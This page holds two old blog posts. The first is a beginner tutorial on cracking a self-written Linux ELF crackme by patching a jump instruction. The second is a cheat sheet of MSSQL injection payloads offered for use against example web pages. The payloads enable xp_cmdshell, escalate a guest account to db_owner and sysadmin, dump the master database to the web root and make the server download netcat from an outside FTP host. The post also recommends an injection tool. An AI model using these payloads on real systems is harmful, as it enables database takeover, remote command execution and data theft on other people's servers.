ELF Reversing , Beginner

HeY

Again it’s me , MrXX
Like what I was to say in this post I going to talk about sample ELF Reversing

I don’t know how many people talk about this later but this tut was some of the strange & maybe new to learn ( I was see many of cracking team just working on the windows , because Linux is free , he but all the OS need some time’s to do some cracking )

All the words you will read is going from author : MrXX ( like pervious post )
Ok let’s started

First think we need some tools
We use these tools for making are way easier
1-Some Program for Crack
2-the GUI Debugger
3-Hex Editor
4-some knowledge about the ASM , Cracking

Ok the first think : Some PJ for Crack

Source Code

Complied Project

Cracked Pj

I was write sample Crack Me for this part
The crack me is open source : he he

#include<stdio.h>

int
main(){
int password=123456;
int inputpass;

printf(“Please Enter a Password to continue > “);
scanf(” %d”,&inputpass);

if ( inputpass == password ){
printf(“\nWelcome u will able to access the Tool\n”);
printf(“\n======================================\n”);
printf(“\nU able Reverse the linux elf file \n”);
printf(“\nKeep Good job    \n”);
printf(“\n======================================\n”);
}
else
{
printf(“\nBAD Password\n”);
}

return(0);
}

You will available to see in the code , we got the IF statement that was check to value
First the pass is = 123456 ok
If pass = user input show the good message or if not show the bad message
Ok I compile it before and executed and see the message
Please Enter a Password to continue > 123
I enter a wrong code and see the bad message

Bad Message

Bad Message

Know how can I able to see the Good message
Let’s start some reversing
2 – I need the GUI debugger ( why ? because many time I use the windows debugger like olly or ida and know I addict to use the gui )
Ok it isn’t problem ( but don’t be lazy like me , u must use the command line debugger like : many …. )
I going and get the  Zero Debugger from address
http://www.zero-bugs.com
( this is one of the Linux app need to be Cracked | and I release the path for this later )
I startup my Ubuntu Linux ( because I use the Ubuntu version of zero debugger )
And after I install Zero Debugger ( need some pack to be installed ) and run the debugger
From zero debugger I go under File > Execute menu and  open my ELF file and I see the disassemble face of the ELF

ZeroDebugger

ZeroDebugger

I scroll done some line and see the CMP ( Compare ) and in the line under I see the JNZ statement , yeah look good ( 4-this is the way u need some knowledge about the ASM , Cracking )
I wrote done the line , 08048406 75 52   jnz 0x804845a
This is cool for the first Crack me , we don’t need to get to the line and see what’s inside , because the crack me is sample

3- know I need to edit the line and change the 75 52 hex to 74 52
Ok I start the hexedit program

HexEditing

HexEditing

And go to the 00000400 line , find the 406 hex code ( remember the 08048406 ) and change the 75 to 74
I save the file into crackme cracked and executed again
I enter a wrong code again and see , yeah the good message

Good Message

Good Message

We able to Reverse the ELF file
This is it , all routine was sample
But don’t be happy , because when the code getting bigger you will got the bad problem ( why ? because there is no olly or ida or sample code to reverse )
And u must do with command line and many line of code

In the next step we going to crack be bigger crack me : called CrackMe2 using Function
Good luck

Ms-Sql Injection Privilege Escalation !

Hi God .

Hi Again My Readers!
[Attention ] : I  Break Long command .
1- In mssql , when your Privilege Is USER or Db_Owner You will can Enable XP_DIRTREE And Dir wanted Drive .

viewdetail.aspx?test=22′;exec+master.dbo.sp_addextendedproc+
+0x780070005f006400690072007400720065006500,0x7800700073007400610072002e0064006c006c00–

After Enable , You Can Execute Xp_dirtree and save Result In Database & view It.

2- Enable Execute in Administrator Privilege Without Execute Permission :

Enable XP_EXC:

viewdetail.aspx?test=22′;EXEC+sp_configure+
+’show advanced options’,1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,1;RECONFIGURE;

Enable OS_EX

viewdetail.aspx?test=22′;exec sp_configure ‘show advanced options’,1;RECONFIGURE;
exec sp_configure ‘Ole Automation Procedures’,1;RECONFIGURE;

After Execute :

viewdetail.aspx?test=22′;EXEC xp_cmdshell ‘ping 127.0.0.1′ ;

3- Back UP From Database :

viewdetail.aspx?test=22”+BACKUP database master to disk=’d:\Inetpub\wwwroot\1.zip’;–

4- GUEST = DB_OWNER :

/FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysusers’
exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set sid=0×01,roles=0×01 where name=”guest”’,'xx’ exec sp_executesql N’drop view dbo.test’–

5 – ADDIN TO “BUILTIN\ADMINISTRATORS”

FullStory.asp?id=1;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysxlogins’ exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set xstatus=18 where name=”BUILTIN\ADMINISTRATORS”’,'xx’ exec sp_executesql N’drop view dbo.test’–

and then :

FullStory.asp?id=1;exec master..sp_addsrvrolemember ‘nhaxinh’,sysadmin –

ENABLE OPENROWSET/OLEDB :

FullStory.asp?id=1;select * from openrowset(‘sqloledb’,”;;,”)–

6- Open Remote Link :

/FullStory.asp?id=1;select * from openrowset(‘sqloledb’,”;;,”)–

7 – UPLOAD NETCAT or …

/FullStory.asp?id=1;select * from openrowset(‘sqloledb’, ‘server=UNESCO;uid=BUILTIN\Administrators;pwd=’,'set fmtonly off select 1 exec master..xp_cmdshell “echo open a.b.c.d >f & echo user a a >>f & echo bin >>f & echo cd a >>f & echo mget * >>f & echo quit >>f & ftp -v -i -n -s:f” & del f’)– (> == “>”)

Code:

echo open a.b.c.d >f

echo user a a >>f

echo bin >> f

echo cd a >>f

echo mget * >>f

echo quit >>f

ftp -v -i -n -s:f

del f

Another Way? !

You Can use PANGOLIN , it is good Sql injector with bypass some Protection :

Download :

http://www.nosec.org/

Enjoy .

Daphne .

Get Adobe Flash playerPlugin by wpburn.com wordpress themes